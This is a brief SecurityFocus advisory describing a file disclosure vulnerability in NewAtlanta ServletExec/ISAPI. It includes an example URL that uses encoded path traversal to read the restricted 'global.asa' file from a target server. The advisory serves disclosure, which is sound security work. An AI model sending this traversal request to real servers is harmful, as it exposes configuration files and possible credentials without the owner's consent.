NewAtlanta ServletExec/ISAPI File Disclosure Vulnerability

This issue may be exploited with a web browser. The following example may be used to disclose the contents of 'global.asa', which is ordinarily restricted from being served by the software:

http://target/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5c\global.asa


 

Privacy Statement
Copyright 2010, SecurityFocus